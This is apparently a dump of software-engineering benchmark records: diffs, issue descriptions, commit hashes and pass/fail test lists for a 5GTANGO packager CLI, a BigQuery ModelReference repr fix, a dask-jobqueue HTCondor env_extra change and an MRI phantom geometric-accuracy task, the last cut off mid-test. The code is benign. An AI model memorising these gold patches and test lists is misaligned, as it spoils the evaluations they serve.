+# funded by the European Commission under Grant number 671517 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.sonata-nfv.eu).
+#
+# This work has also been performed in the framework of the 5GTANGO project,
+# funded by the European Commission under Grant number 761493 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.5gtango.eu).
+import logging
+import argparse
+import os
+import sys
+
+
+LOG = logging.getLogger(os.path.basename(__file__))
+
+
+class CLI(object):
+
+ def __init__(self, args, packager):
+ self._args = args
+ self._p = packager
+
+ def dispatch(self):
+ if self._args.package:
+ # package creation
+ self._p.package()
+ else:
+ # un-packaging
+ self._p.unpackage()
+
+
+def parse_args(input_args=None):
+ parser = argparse.ArgumentParser(
+ description="5GTANGO SDK packager")
+
+ parser.add_argument(
+ "-p",
+ "--package",
+ help="Create package from given project.",
+ required=False,
+ default=None,
+ dest="package")
+
+ parser.add_argument(
+ "-u",
+ "--unpackage",
+ help="Unpackage given package.",
+ required=False,
+ default=None,
+ dest="unpackage")
+
+ parser.add_argument(
+ "--format",
+ help="Package format [5GTANGO|OSM]."
+ + "\nDefault: 5GTANGO",
+ required=False,
+ default="5GTANGO",
+ dest="format")
+
+ parser.add_argument(
+ "-v",
+ "--verbose",
+ help="Output debug messages.",
+ required=False,
+ default=False,
+ dest="verbose",
+ action="store_true")
+
+ parser.add_argument(
+ "-s",
+ "--service",
+ help="Run packager in service mode with REST API.",
+ required=False,
+ default=False,
+ dest="service",
+ action="store_true")
+
+ parser.add_argument(
+ "--address",
+ help="Listen address of REST API when in service mode."
+ + "\nDefault: 0.0.0.0",
+ required=False,
+ default="0.0.0.0",
+ dest="service_address")
+
+ parser.add_argument(
+ "--port",
+ help="TCP port of REST API when in service mode."
+ + "\nDefault: 5099",
+ required=False,
+ default=5099,
+ dest="service_port")
+ if input_args is None:
+ input_args = sys.argv[1:]
+ return parser.parse_args(input_args)
diff --git a/src/tngsdk/package/pkgmgm.py b/src/tngsdk/package/pkgmgm.py
new file mode 100644
index 0000000..f40ac40
--- /dev/null
+++ b/src/tngsdk/package/pkgmgm.py
@@ -0,0 +1,48 @@
+# Copyright (c) 2018 SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# ALL RIGHTS RESERVED.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Neither the name of the SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# nor the names of its contributors may be used to endorse or promote
+# products derived from this software without specific prior written
+# permission.
+#
+# This work has been performed in the framework of the SONATA project,
+# funded by the European Commission under Grant number 671517 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.sonata-nfv.eu).
+#
+# This work has also been performed in the framework of the 5GTANGO project,
+# funded by the European Commission under Grant number 761493 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.5gtango.eu).
+import logging
+import os
+
+
+LOG = logging.getLogger(os.path.basename(__file__))
+
+
+class Packager(object):
+
+ def __init__(self, args):
+ self._args = args
+
+ def package(self):
+ LOG.warning("packaging not implemented")
+
+ def unpackage(self):
+ LOG.warning("unpackaging not implemented")
|
sonata-nfv/tng-sdk-package
|
ff3c5eeee949fc5b3a379d1bbb753f6e24fb0991
|
diff --git a/src/tngsdk/package/tests/test_unit_package.py b/src/tngsdk/package/rest.py
old mode 100755
new mode 100644
similarity index 92%
rename from src/tngsdk/package/tests/test_unit_package.py
rename to src/tngsdk/package/rest.py
index 1c80e24..49a747d
--- a/src/tngsdk/package/tests/test_unit_package.py
+++ b/src/tngsdk/package/rest.py
@@ -29,12 +29,3 @@
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.5gtango.eu).
-
-
-import unittest
-
-
-class TngSdkPackageTest(unittest.TestCase):
-
- def test_test(self):
- self.assertTrue(True)
diff --git a/src/tngsdk/package/tests/test_unit_pkgmgm.py b/src/tngsdk/package/tests/test_unit_pkgmgm.py
new file mode 100755
index 0000000..53d79ab
--- /dev/null
+++ b/src/tngsdk/package/tests/test_unit_pkgmgm.py
@@ -0,0 +1,58 @@
+# Copyright (c) 2015 SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# ALL RIGHTS RESERVED.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Neither the name of the SONATA-NFV, 5GTANGO, UBIWHERE, Paderborn University
+# nor the names of its contributors may be used to endorse or promote
+# products derived from this software without specific prior written
+# permission.
+#
+# This work has been performed in the framework of the SONATA project,
+# funded by the European Commission under Grant number 671517 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.sonata-nfv.eu).
+#
+# This work has also been performed in the framework of the 5GTANGO project,
+# funded by the European Commission under Grant number 761493 through
+# the Horizon 2020 and 5G-PPP programmes. The authors would like to
+# acknowledge the contributions of their colleagues of the SONATA
+# partner consortium (www.5gtango.eu).
+
+
+import unittest
+from tngsdk.package.cli import parse_args
+from tngsdk.package.pkgmgm import Packager
+
+
+class TngSdkPkgMgmTest(unittest.TestCase):
+
+ def setUp(self):
+ # list can manually define CLI arguments
+ self.args = parse_args([])
+
+ def tearDown(self):
+ pass
+
+ def test_instantiation(self):
+ p = Packager(self.args)
+ del p
+
+ def test_package(self):
+ p = Packager(self.args)
+ p.package()
+
+ def test_unpackage(self):
+ p = Packager(self.args)
+ p.unpackage()
|
Add basic command line interface
Example:
```
tng-package -h
usage: tng-package [-h] [-p PACKAGE] [-u UNPACKAGE] [--format FORMAT] [-v]
[-s] [--address SERVICE_PORT] [--port SERVICE_PORT]
5GTANGO SDK packager
optional arguments:
-h, --help show this help message and exit
-p PACKAGE, --package PACKAGE
Create package from given project.
-u UNPACKAGE, --unpackage UNPACKAGE
Unpackage given package.
--format FORMAT Package format [5GTANGO|OSM]. Default: 5GTANGO
-v, --verbose Output debug messages.
-s, --service Run packager in service mode with REST API.
--address SERVICE_PORT
Listen address of REST API when in service mode.
Default: 0.0.0.0
--port SERVICE_PORT TCP port of REST API when in service mode. Default:
5099
```
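The same arguments can also be built programmatically, as the unit tests in the accompanying patch do (the package file name below is only a placeholder):
```
from tngsdk.package.cli import parse_args
from tngsdk.package.pkgmgm import Packager

args = parse_args(["-u", "example-package.tgo", "-v"])  # placeholder file name
p = Packager(args)
p.unpackage()  # currently only logs "unpackaging not implemented"
```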
|
0.0
|
ff3c5eeee949fc5b3a379d1bbb753f6e24fb0991
|
[
"src/tngsdk/package/tests/test_unit_pkgmgm.py::TngSdkPkgMgmTest::test_instantiation",
"src/tngsdk/package/tests/test_unit_pkgmgm.py::TngSdkPkgMgmTest::test_package",
"src/tngsdk/package/tests/test_unit_pkgmgm.py::TngSdkPkgMgmTest::test_unpackage"
] |
[] |
{
"failed_lite_validators": [
"has_added_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2018-02-13 13:10:35+00:00
|
apache-2.0
| 5,600
|
|
googleapis__python-bigquery-66
|
diff --git a/google/cloud/bigquery/model.py b/google/cloud/bigquery/model.py
index d39ec5f2..a2510e86 100644
--- a/google/cloud/bigquery/model.py
+++ b/google/cloud/bigquery/model.py
@@ -430,6 +430,6 @@ class ModelReference(object):
return hash(self._key())
def __repr__(self):
- return "ModelReference(project='{}', dataset_id='{}', project_id='{}')".format(
+ return "ModelReference(project_id='{}', dataset_id='{}', model_id='{}')".format(
self.project, self.dataset_id, self.model_id
)
|
googleapis/python-bigquery
|
2abdef82bed31601d1ca1aa92a10fea1e09f5297
|
diff --git a/tests/unit/model/test_model.py b/tests/unit/model/test_model.py
index bbb93ef9..90fc09e6 100644
--- a/tests/unit/model/test_model.py
+++ b/tests/unit/model/test_model.py
@@ -316,5 +316,5 @@ def test_repr(target_class):
got = repr(model)
assert got == (
"Model(reference=ModelReference("
- "project='my-proj', dataset_id='my_dset', project_id='my_model'))"
+ "project_id='my-proj', dataset_id='my_dset', model_id='my_model'))"
)
diff --git a/tests/unit/model/test_model_reference.py b/tests/unit/model/test_model_reference.py
index ff1d1df7..39dabb55 100644
--- a/tests/unit/model/test_model_reference.py
+++ b/tests/unit/model/test_model_reference.py
@@ -136,5 +136,5 @@ def test_repr(target_class):
got = repr(model)
assert (
got
- == "ModelReference(project='my-proj', dataset_id='my_dset', project_id='my_model')"
+ == "ModelReference(project_id='my-proj', dataset_id='my_dset', model_id='my_model')"
)
|
Bigquery: Model reference repr seems wrong for model_id
The repr of `ModelReference` labels the `model_id` value as `project_id`:
https://github.com/googleapis/python-bigquery/blob/be5c8b1ede9a2d762fd5574c32587d125eca4713/google/cloud/bigquery/model.py#L432-L435
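A minimal illustration of the expected output, mirroring the updated unit test:
```
from google.cloud.bigquery.model import ModelReference

ref = ModelReference.from_string("my-proj.my_dset.my_model")
print(repr(ref))
# ModelReference(project_id='my-proj', dataset_id='my_dset', model_id='my_model')
```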
|
0.0
|
2abdef82bed31601d1ca1aa92a10fea1e09f5297
|
[
"tests/unit/model/test_model.py::test_repr",
"tests/unit/model/test_model_reference.py::test_repr"
] |
[
"tests/unit/model/test_model.py::test_ctor",
"tests/unit/model/test_model.py::test_ctor_string",
"tests/unit/model/test_model.py::test_from_api_repr",
"tests/unit/model/test_model.py::test_from_api_repr_w_minimal_resource",
"tests/unit/model/test_model.py::test_from_api_repr_w_unknown_fields",
"tests/unit/model/test_model.py::test_build_resource[resource0-filter_fields0-expected0]",
"tests/unit/model/test_model.py::test_build_resource[resource1-filter_fields1-expected1]",
"tests/unit/model/test_model.py::test_build_resource[resource2-filter_fields2-expected2]",
"tests/unit/model/test_model.py::test_build_resource[resource3-filter_fields3-expected3]",
"tests/unit/model/test_model.py::test_build_resource[resource4-filter_fields4-expected4]",
"tests/unit/model/test_model.py::test_build_resource[resource5-filter_fields5-expected5]",
"tests/unit/model/test_model.py::test_set_description",
"tests/unit/model/test_model.py::test_set_expires",
"tests/unit/model/test_model.py::test_set_friendly_name",
"tests/unit/model/test_model.py::test_set_labels",
"tests/unit/model/test_model.py::test_replace_labels",
"tests/unit/model/test_model.py::test_set_encryption_configuration",
"tests/unit/model/test_model_reference.py::test_from_api_repr",
"tests/unit/model/test_model_reference.py::test_from_api_repr_w_unknown_fields",
"tests/unit/model/test_model_reference.py::test_to_api_repr",
"tests/unit/model/test_model_reference.py::test_from_string",
"tests/unit/model/test_model_reference.py::test_from_string_legacy_string",
"tests/unit/model/test_model_reference.py::test_from_string_not_fully_qualified",
"tests/unit/model/test_model_reference.py::test_from_string_with_default_project",
"tests/unit/model/test_model_reference.py::test_from_string_ignores_default_project",
"tests/unit/model/test_model_reference.py::test_eq",
"tests/unit/model/test_model_reference.py::test_hash"
] |
{
"failed_lite_validators": [
"has_short_problem_statement"
],
"has_test_patch": true,
"is_lite": false
}
|
2020-03-24 14:59:08+00:00
|
apache-2.0
| 2,622
|
|
dask__dask-jobqueue-563
|
diff --git a/dask_jobqueue/htcondor.py b/dask_jobqueue/htcondor.py
index fb7b0be..18fc74e 100644
--- a/dask_jobqueue/htcondor.py
+++ b/dask_jobqueue/htcondor.py
@@ -16,7 +16,6 @@ class HTCondorJob(Job):
%(job_header)s
-Environment = "%(quoted_environment)s"
Arguments = "%(quoted_arguments)s"
Executable = %(executable)s
@@ -67,7 +66,14 @@ Queue
env_extra = dask.config.get(
"jobqueue.%s.env-extra" % self.config_name, default=[]
)
- self.env_dict = self.env_lines_to_dict(env_extra)
+
+ if env_extra is not None:
+ # Overwrite command template: prepend commands from env_extra separated by semicolon.
+ # This is special for HTCondor, because lines to execute on the worker node cannot be
+ # simply added to the submit script like for other batch systems.
+ self._command_template = (
+ "; ".join(env_extra) + "; " + self._command_template
+ )
self.job_header_dict = {
"MY.DaskWorkerName": '"htcondor--$F(MY.JobId)--"',
@@ -118,31 +124,15 @@ Queue
+ " ".join(shlex.quote(arg) for arg in cancel_command_extra)
)
- def env_lines_to_dict(self, env_lines):
- """Convert an array of export statements (what we get from env-extra
- in the config) into a dict"""
- env_dict = {}
- for env_line in env_lines:
- split_env_line = shlex.split(env_line)
- if split_env_line[0] == "export":
- split_env_line = split_env_line[1:]
- for item in split_env_line:
- if "=" in item:
- k, v = item.split("=", 1)
- env_dict[k] = v
- return env_dict
-
def job_script(self):
"""Construct a job submission script"""
quoted_arguments = quote_arguments(["-c", self._command_template])
- quoted_environment = quote_environment(self.env_dict)
job_header_lines = "\n".join(
"%s = %s" % (k, v) for k, v in self.job_header_dict.items()
)
return self._script_template % {
"shebang": self.shebang,
"job_header": job_header_lines,
- "quoted_environment": quoted_environment,
"quoted_arguments": quoted_arguments,
"executable": self.executable,
}
@@ -260,6 +250,17 @@ class HTCondorCluster(JobQueueCluster):
This also works with adaptive clusters. This automatically launches and kill workers based on load.
>>> cluster.adapt(maximum_jobs=20)
+
+ If setup commands need to be run before starting the worker on the worker node, ``env_extra`` can be used,
+ e.g., to activate a virtual environment:
+
+ >>> from dask_jobqueue.htcondor import HTCondorCluster
+ >>> cluster = HTCondorCluster(cores=1, memory="2GB", disk="4GB",
+ env_extra=['cd /some/path/', 'source venv/bin/activate'])
+
+ Note that environment variables are no longer passed via the ``Environment`` parameter in the submit
+ description file. If you explictly want to set that, you need to use ``job_extra``.
+
""".format(
job=job_parameters, cluster=cluster_parameters
)
diff --git a/docs/source/advanced-tips-and-tricks.rst b/docs/source/advanced-tips-and-tricks.rst
index bd79810..237adc6 100644
--- a/docs/source/advanced-tips-and-tricks.rst
+++ b/docs/source/advanced-tips-and-tricks.rst
@@ -68,6 +68,36 @@ accepted option on some SLURM clusters. The error was something like this:
sbatch: error: Memory specification can not be satisfied
sbatch: error: Batch job submission failed: Requested node configuration is not available
+Run setup commands before starting the worker with ``env_extra``
+----------------------------------------------------------------
+
+Sometimes you need to run some setup commands before the actual worker can be started. This includes
+setting environment variables, loading environment modules, sourcing/activating a virtual environment,
+or activating conda/mamba environments.
+
+This can be achieved using the ``env_extra`` parameter. Example for setting up a virtual environment:
+
+.. code-block:: python
+
+ from dask_jobqueue.htcondor import HTCondorCluster
+ env_extra = ['cd /some/path', 'source venv/bin/activate']
+ cluster = HTCondorCluster(cores=1, memory="2GB", disk="4GB", log_directory = 'logs', python='python3',
+ env_extra=env_extra)
+ print(cluster.job_script())
+
+For ``HTCondorCluster``, the commands will be prepended to the actual python call in the ``Arguments``
+parameter in the submit description file. The relevant lines will look like this:
+
+.. code-block:: text
+
+ ...
+ Arguments = "-c 'cd /some/path; source venv/bin/activate; python3 -m distributed.cli.dask_worker tcp://<IP>:<PORT> --nthreads 1 --memory-limit 2.00GB --name dummy-name --nanny --death-timeout 60'"
+ Executable = /bin/sh
+ ...
+
+For other batch systems (``*Cluster`` classes) the additional commands will be inserted as separate lines
+in the submission script.
+
How to handle job queueing system walltime killing workers
----------------------------------------------------------
diff --git a/docs/source/examples.rst b/docs/source/examples.rst
index ad02971..4f9a382 100644
--- a/docs/source/examples.rst
+++ b/docs/source/examples.rst
@@ -32,7 +32,7 @@ PBS Deployments
interface='ib0')
Moab Deployments
-~~~~~~~~~~~~~~~~
+----------------
On systems which use the Moab Workload Manager, a subclass of ``PBSCluster``
can be used, called ``MoabCluster``:
|
dask/dask-jobqueue
|
066f69c0994d2a87b7b0a54d7de6e2d296d04575
|
diff --git a/dask_jobqueue/tests/test_htcondor.py b/dask_jobqueue/tests/test_htcondor.py
index 99a5573..1664da8 100644
--- a/dask_jobqueue/tests/test_htcondor.py
+++ b/dask_jobqueue/tests/test_htcondor.py
@@ -27,7 +27,12 @@ def test_job_script():
processes=2,
memory="100MB",
disk="100MB",
- env_extra=['export LANG="en_US.utf8"', 'export LC_ALL="en_US.utf8"'],
+ env_extra=[
+ 'export LANG="en_US.utf8"',
+ 'export LC_ALL="en_US.utf8"',
+ "cd /some/path/",
+ "source venv/bin/activate",
+ ],
job_extra={"+Extra": "True"},
submit_command_extra=["-verbose"],
cancel_command_extra=["-forcex"],
@@ -40,9 +45,10 @@ def test_job_script():
assert "MY.DaskWorkerDisk = 100000000" in job_script
assert "MY.DaskWorkerMemory = 100000000" in job_script
assert 'MY.JobId = "$(ClusterId).$(ProcId)"' in job_script
- assert "LANG=en_US.utf8" in job_script
- assert "LC_ALL=en_US.utf8" in job_script
- assert "export" not in job_script
+ assert 'export LANG=""en_US.utf8""' in job_script
+ assert 'export LC_ALL=""en_US.utf8""' in job_script
+ assert "cd /some/path/" in job_script
+ assert "source venv/bin/activate" in job_script
assert "+Extra = True" in job_script
assert re.search(
r"condor_submit\s.*-verbose", cluster._dummy_job.submit_command
|
Incorrect description for env_extra for HTCondorCluster
Hi,
The description for env_extra in [HTCondorCluster](https://jobqueue.dask.org/en/latest/generated/dask_jobqueue.HTCondorCluster.html#dask_jobqueue.HTCondorCluster) is not correct: the job that HTCondorCluster creates calls dask-worker directly instead of through a bash wrapper script, so you cannot put arbitrary shell commands into env_extra.
The interface supports environment variables as `key=value` pairs, which will be inserted into dask-worker's environment (via the "Environment" attribute in the submit file). (For consistency, you can write `export foo=bar` but the word "export" will be ignored.)
This is also important to keep in mind with regards to #323; renaming env_extra to job_script_extra or similar would be even more inaccurate (for the HTCondor case anyway).
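For illustration, how `env_extra` is typically passed (mirroring the cluster construction shown in the docs): before this change, only the `key=value` assignments survived, folded into the submit file's `Environment` attribute, while commands such as `source venv/bin/activate` were dropped.
```
from dask_jobqueue import HTCondorCluster

cluster = HTCondorCluster(
    cores=1, memory="2GB", disk="2GB",
    env_extra=['export LANG="en_US.utf8"', "source venv/bin/activate"],
)
print(cluster.job_script())
```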
|
0.0
|
066f69c0994d2a87b7b0a54d7de6e2d296d04575
|
[
"dask_jobqueue/tests/test_htcondor.py::test_job_script"
] |
[
"dask_jobqueue/tests/test_htcondor.py::test_header",
"dask_jobqueue/tests/test_htcondor.py::test_config_name_htcondor_takes_custom_config"
] |
{
"failed_lite_validators": [
"has_hyperlinks",
"has_issue_reference",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-07-26 13:35:37+00:00
|
bsd-3-clause
| 1,804
|
|
GSTT-CSC__hazen-312
|
diff --git a/hazenlib/tasks/acr_geometric_accuracy.py b/hazenlib/tasks/acr_geometric_accuracy.py
new file mode 100644
index 0000000..b71f00b
--- /dev/null
+++ b/hazenlib/tasks/acr_geometric_accuracy.py
@@ -0,0 +1,241 @@
+"""
+ACR Geometric Accuracy
+https://www.acraccreditation.org/-/media/acraccreditation/documents/mri/largephantomguidance.pdf
+
+Calculates geometric accuracy for slices 1 and 5 of the ACR phantom.
+
+This script calculates the horizontal and vertical lengths of the ACR phantom in Slice 1 in accordance with the ACR Guidance.
+This script calculates the horizontal, vertical and diagonal lengths of the ACR phantom in Slice 5 in accordance with the ACR Guidance.
+The average distance measurement error, maximum distance measurement error and coefficient of variation of all distance
+measurements is reported as recommended by IPEM Report 112, "Quality Control and Artefacts in Magnetic Resonance Imaging".
+
+This is done by first producing a binary mask for each respective slice. Line profiles are drawn with aid of rotation
+matrices around the centre of the test object to determine each respective length. The results are also visualised.
+
+Created by Yassine Azma
+yassine.azma@rmh.nhs.uk
+
+18/11/2022
+"""
+
+import sys
+import traceback
+import os
+import numpy as np
+import skimage.morphology
+import skimage.measure
+import skimage.transform
+
+from hazenlib.HazenTask import HazenTask
+
+
+class ACRGeometricAccuracy(HazenTask):
+
+ def __init__(self, **kwargs):
+ super().__init__(**kwargs)
+
+ def run(self) -> dict:
+ results = {}
+ z = []
+ for dcm in self.data:
+ z.append(dcm.ImagePositionPatient[2])
+
+ idx_sort = np.argsort(z)
+
+ for dcm in self.data:
+ if dcm.ImagePositionPatient[2] == z[idx_sort[0]]:
+ try:
+ result1 = self.get_geometric_accuracy_slice1(dcm)
+ except Exception as e:
+ print(f"Could not calculate the geometric accuracy for {self.key(dcm)} because of : {e}")
+ traceback.print_exc(file=sys.stdout)
+ continue
+
+ results[self.key(dcm)] = result1
+ elif dcm.ImagePositionPatient[2] == z[idx_sort[4]]:
+ try:
+ result5 = self.get_geometric_accuracy_slice5(dcm)
+ except Exception as e:
+ print(f"Could not calculate the geometric accuracy for {self.key(dcm)} because of : {e}")
+ traceback.print_exc(file=sys.stdout)
+ continue
+
+ results[self.key(dcm)] = result5
+
+ results['reports'] = {'images': self.report_files}
+
+ L = result1 + result5
+ mean_err, max_err, cov_l = self.distortion_metric(L)
+ print(f"Mean relative measurement error is equal to {np.round(mean_err, 2)}mm")
+ print(f"Maximum absolute measurement error is equal to {np.round(max_err, 2)}mm")
+ print(f"Coefficient of variation of measurements is equal to {np.round(cov_l, 2)}%")
+ return results
+
+ def centroid_com(self, dcm):
+ # Calculate centroid of object using a centre-of-mass calculation
+ thresh_img = dcm > 0.25 * np.max(dcm)
+ open_img = skimage.morphology.area_opening(thresh_img, area_threshold=500)
+ bhull = skimage.morphology.convex_hull_image(open_img)
+ coords = np.nonzero(bhull) # row major - first array is columns
+
+ sum_x = np.sum(coords[1])
+ sum_y = np.sum(coords[0])
+ cx, cy = sum_x / coords[0].shape[0], sum_y / coords[1].shape[0]
+ cxy = (round(cx), round(cy))
+
+ return bhull, cxy
+
+ def horizontal_length(self, res, mask, cxy):
+ dims = mask.shape
+ start_h = (cxy[1], 0)
+ end_h = (cxy[1], dims[0] - 1)
+ line_profile_h = skimage.measure.profile_line(mask, start_h, end_h, mode='reflect')
+ extent_h = np.nonzero(line_profile_h)[0]
+ dist_h = (extent_h[-1] - extent_h[0]) * res[0]
+
+ h_dict = {
+ 'Start': start_h,
+ 'End': end_h,
+ 'Extent': extent_h,
+ 'Distance': dist_h
+ }
+ return h_dict
+
+ def vertical_length(self, res, mask, cxy):
+ dims = mask.shape
+ start_v = (0, cxy[0])
+ end_v = (dims[1] - 1, cxy[0])
+ line_profile_v = skimage.measure.profile_line(mask, start_v, end_v, mode='reflect')
+ extent_v = np.nonzero(line_profile_v)[0]
+ dist_v = (extent_v[-1] - extent_v[0]) * res[1]
+
+ v_dict = {
+ 'Start': start_v,
+ 'End': end_v,
+ 'Extent': extent_v,
+ 'Distance': dist_v
+ }
+ return v_dict
+
+ def rotate_point(self, origin, point, angle):
+ theta = np.radians(angle)
+ c, s = np.cos(theta), np.sin(theta)
+
+ x_prime = origin[0] + c * (point[0] - origin[0]) - s * (point[1] - origin[1])
+ y_prime = origin[1] + s * (point[0] - origin[0]) + c * (point[1] - origin[1])
+ return x_prime, y_prime
+
+ def diagonal_lengths(self, res, mask, cxy):
+ eff_res = np.sqrt(np.mean(np.square(res)))
+ mask_rotate = skimage.transform.rotate(mask, 45, center=(cxy[0], cxy[1]))
+
+ h_dict = self.horizontal_length(res, mask_rotate, cxy)
+ extent_h = h_dict['Extent']
+
+ origin = (cxy[0], cxy[1])
+ start = (extent_h[0], cxy[1])
+ end = (extent_h[-1], cxy[1])
+ se_x_start, se_y_start = self.rotate_point(origin, start, 45)
+ se_x_end, se_y_end = self.rotate_point(origin, end, 45)
+
+ dist_se = np.sqrt(np.sum(np.square([se_x_end - se_x_start, se_y_end - se_y_start]))) * eff_res
+ se_dict = {
+ 'Start': (se_x_start, se_y_start),
+ 'End': (se_x_end, se_y_end),
+ 'Extent': (se_x_end - se_x_start, se_y_end - se_y_start),
+ 'Distance': dist_se
+ }
+
+ v_dict = self.vertical_length(res, mask_rotate, cxy)
+ extent_v = v_dict['Extent']
+
+ start = (cxy[0], extent_v[0])
+ end = (cxy[0], extent_v[-1])
+ sw_x_start, sw_y_start = self.rotate_point(origin, start, 45)
+ sw_x_end, sw_y_end = self.rotate_point(origin, end, 45)
+
+ dist_sw = np.sqrt(np.sum(np.square([sw_x_end - sw_x_start, sw_y_end - sw_y_start]))) * eff_res
+ sw_dict = {
+ 'Start': (sw_x_start, sw_y_start),
+ 'End': (sw_x_end, sw_y_end),
+ 'Extent': (sw_x_end - sw_x_start, sw_y_end - sw_y_start),
+ 'Distance': dist_sw
+ }
+
+ return sw_dict, se_dict
+
+ def get_geometric_accuracy_slice1(self, dcm):
+ img = dcm.pixel_array
+ res = dcm.PixelSpacing
+ mask, cxy = self.centroid_com(img)
+
+ h_dict = self.horizontal_length(res, mask, cxy)
+ v_dict = self.vertical_length(res, mask, cxy)
+
+ if self.report:
+ import matplotlib.pyplot as plt
+ fig = plt.figure()
+ fig.set_size_inches(8, 8)
+ plt.imshow(img)
+
+ plt.arrow(h_dict['Extent'][0], cxy[1], h_dict['Extent'][-1] - h_dict['Extent'][0], 1, color='blue',
+ length_includes_head=True, head_width=5)
+ plt.arrow(cxy[0], v_dict['Extent'][0], 1, v_dict['Extent'][-1] - v_dict['Extent'][0], color='orange',
+ length_includes_head=True, head_width=5)
+ plt.legend([str(np.round(h_dict['Distance'], 2)) + 'mm',
+ str(np.round(v_dict['Distance'], 2)) + 'mm'])
+ plt.axis('off')
+ plt.title('Geometric Accuracy for Slice 1')
+
+ img_path = os.path.realpath(os.path.join(self.report_path, f'{self.key(dcm)}.png'))
+ fig.savefig(img_path)
+ self.report_files.append(img_path)
+
+ return h_dict['Distance'], v_dict['Distance']
+
+ def get_geometric_accuracy_slice5(self, dcm):
+ img = dcm.pixel_array
+ res = dcm.PixelSpacing
+ mask, cxy = self.centroid_com(img)
+
+ h_dict = self.horizontal_length(res, mask, cxy)
+ v_dict = self.vertical_length(res, mask, cxy)
+ sw_dict, se_dict = self.diagonal_lengths(res, mask, cxy)
+
+ if self.report:
+ import matplotlib.pyplot as plt
+ fig = plt.figure()
+ fig.set_size_inches(8, 8)
+ plt.imshow(img)
+
+ plt.arrow(h_dict['Extent'][0], cxy[1], h_dict['Extent'][-1] - h_dict['Extent'][0], 1, color='blue',
+ length_includes_head=True, head_width=5)
+ plt.arrow(cxy[0], v_dict['Extent'][0], 1, v_dict['Extent'][-1] - v_dict['Extent'][0], color='orange',
+ length_includes_head=True, head_width=5)
+
+ plt.arrow(se_dict['Start'][0], se_dict['Start'][1], se_dict['Extent'][0], se_dict['Extent'][1],
+ color='purple', length_includes_head=True, head_width=5)
+ plt.arrow(sw_dict['Start'][0], sw_dict['Start'][1], sw_dict['Extent'][0], sw_dict['Extent'][1],
+ color='yellow', length_includes_head=True, head_width=5)
+
+ plt.legend([str(np.round(h_dict['Distance'], 2)) + 'mm',
+ str(np.round(v_dict['Distance'], 2)) + 'mm',
+ str(np.round(sw_dict['Distance'], 2)) + 'mm',
+ str(np.round(se_dict['Distance'], 2)) + 'mm'])
+ plt.axis('off')
+ plt.title('Geometric Accuracy for Slice 5')
+
+ img_path = os.path.realpath(os.path.join(self.report_path, f'{self.key(dcm)}.png'))
+ fig.savefig(img_path)
+ self.report_files.append(img_path)
+
+ return h_dict['Distance'], v_dict['Distance'], sw_dict['Distance'], se_dict['Distance']
+
+ def distortion_metric(self, L):
+ err = [x - 190 for x in L]
+ mean_err = np.mean(err)
+
+ max_err = np.max(np.absolute(err))
+ cov_l = 100 * np.std(L) / np.mean(L)
+
+ return mean_err, max_err, cov_l
|
GSTT-CSC/hazen
|
8aaa233168a543c493961f193802fc4607ac4997
|
diff --git a/.github/workflows/test_cli.yml b/.github/workflows/test_cli.yml
index 9082b13..203650d 100644
--- a/.github/workflows/test_cli.yml
+++ b/.github/workflows/test_cli.yml
@@ -55,6 +55,11 @@ jobs:
run: |
hazen acr_ghosting tests/data/acr/Siemens --report
+ - name: test acr_geometric_accuracy
+ if: always() # will always run regardless of whether previous step fails - useful to ensure all CLI functions tested
+ run: |
+ hazen acr_geometric_accuracy tests/data/acr/Siemens --report
+
- name: test slice_position
if: always() # will always run regardless of whether previous step fails - useful to ensure all CLI functions tested
run: |
diff --git a/tests/test_acr_geometric_accuracy.py b/tests/test_acr_geometric_accuracy.py
new file mode 100644
index 0000000..0de6d26
--- /dev/null
+++ b/tests/test_acr_geometric_accuracy.py
@@ -0,0 +1,72 @@
+import os
+import unittest
+import pathlib
+import pydicom
+import numpy as np
+
+from hazenlib.tasks.acr_geometric_accuracy import ACRGeometricAccuracy
+from tests import TEST_DATA_DIR, TEST_REPORT_DIR
+
+
+class TestACRGeometricAccuracySiemens(unittest.TestCase):
+ ACR_GEOMETRIC_ACCURACY_DATA = pathlib.Path(TEST_DATA_DIR / 'acr')
+ centre = (128, 129)
+ L1 = 190.43, 186.52
+ L5 = 190.43, 186.52, 189.45, 191.41
+ test_point = (-60.98, -45.62)
+
+ def setUp(self):
+ self.acr_geometric_accuracy_task = ACRGeometricAccuracy(data_paths=[os.path.join(TEST_DATA_DIR, 'acr')],
+ report_dir=pathlib.PurePath.joinpath(TEST_REPORT_DIR))
+ self.dcm = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'Siemens', '0.dcm'))
+ self.dcm2 = pydicom.read_file(os.path.join(TEST_DATA_DIR, 'acr', 'Siemens', '4.dcm'))
+
+ def test_object_centre(self):
+ data = self.dcm.pixel_array
